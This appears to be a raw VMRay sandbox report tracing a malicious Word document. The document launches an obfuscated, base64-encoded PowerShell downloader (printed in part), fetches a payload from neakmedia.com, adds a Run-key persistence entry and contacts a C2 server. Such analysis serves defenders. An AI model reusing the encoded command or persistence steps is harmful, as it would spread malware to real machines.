VMRay Analyzer Report for Sample #19564 VMRay Analyzer 2.2.0 URI neakmedia.com Resolved_To Address 70.39.145.109 Process 1 2500 winword.exe 1560 winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\program files\microsoft office\office15\winword.exe Child_Of Created Process 2 2664 powershell.exe 2500 powershell.exe pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Process 3 2768 42753.exe 2664 42753.exe "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8~1\appdata\local\temp\42753.exe Child_Of Created Created Created Created Process 4 2788 42753.exe 2768 42753.exe "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8~1\appdata\local\temp\42753.exe Child_Of Created Created Created Created Deleted Moved Created Created Created Process 5 2808 serverhost.exe 2788 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Child_Of Created Created Created Created Process 6 2820 serverhost.exe 2808 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Modified_Properties_Of Connected_To Process 7 992 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 8 3036 ekgeobhbhtp7rxmh.exe 2820 ekgeobhbhtp7rxmh.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe Child_Of Created Created Created Created Process 9 3052 ekgeobhbhtp7rxmh.exe 3036 ekgeobhbhtp7rxmh.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe Child_Of Created Created Created Created Deleted Moved Created Created Created Process 10 3076 serverhost.exe 3052 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Child_Of Created Created Created Created Process 11 3096 serverhost.exe 3076 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Child_Of Child_Of Child_Of Created Deleted Deleted Deleted Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Connected_To Process 12 3152 serverhost.exe 3096 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Opened Opened Opened Process 13 3160 serverhost.exe 3096 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Created Opened Opened Opened Opened Process 14 3172 serverhost.exe 3096 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Created Created Created Created Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Process 15 1860 serverhost.exe 1536 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Windows\system32\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Child_Of Created Created Created Created Process 16 1852 serverhost.exe 1860 serverhost.exe "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" C:\Windows\system32\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe Created Created Created Created Created Created Modified_Properties_Of Connected_To File conout$ File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe exe MD5 d6c8126371d37ffe3100755db6aa22ed SHA1 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256 fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB SocketAddress 70.39.145.109 80 TCP NetworkSocket 70.39.145.109 80 TCP Contains SocketAddress neakmedia.com 80 NetworkConnection HTTP neakmedia.com 80 URI neakmedia.com/hybfPDcL/ Contains URI None File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MACA73F0A File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\bgc6u8~1\appdata\local\temp\42753.exe users\bgc6u8~1\appdata\local\temp\42753.exe c:\ c:\users\bgc6u8~1\appdata\local\temp\42753.exe exe File c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe:zone.identifier File Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe C:\ C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe exe MD5 d6c8126371d37ffe3100755db6aa22ed SHA1 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256 fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec Moved_To File Users\BGC6U8~1\AppData\Local\Temp\42753.exe Users\BGC6U8~1\AppData\Local\Temp\42753.exe C:\ C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe exe Moved_From Mutex Global\I78B95E2E Mutex Global\M78B95E2E File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MA991ED3B File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe exe File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe exe MD5 2b8584cab96d20ee851054f9fedef7f3 SHA1 de72320cc8fc12f2e410afa07809b620f81066dc SHA256 f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER serverhost "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" REG_SZ SocketAddress 74.208.155.175 8080 NetworkConnection HTTP 74.208.155.175 8080 File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MB66D4A35 File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe exe File c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe:zone.identifier File Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe C:\ C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe exe Moved_To File Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe C:\ C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe exe Moved_From Mutex Global\I78B95E2E Mutex Global\M78B95E2E File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MA991ED3B File programdata\c570.tmp programdata\c570.tmp c:\ c:\programdata\c570.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 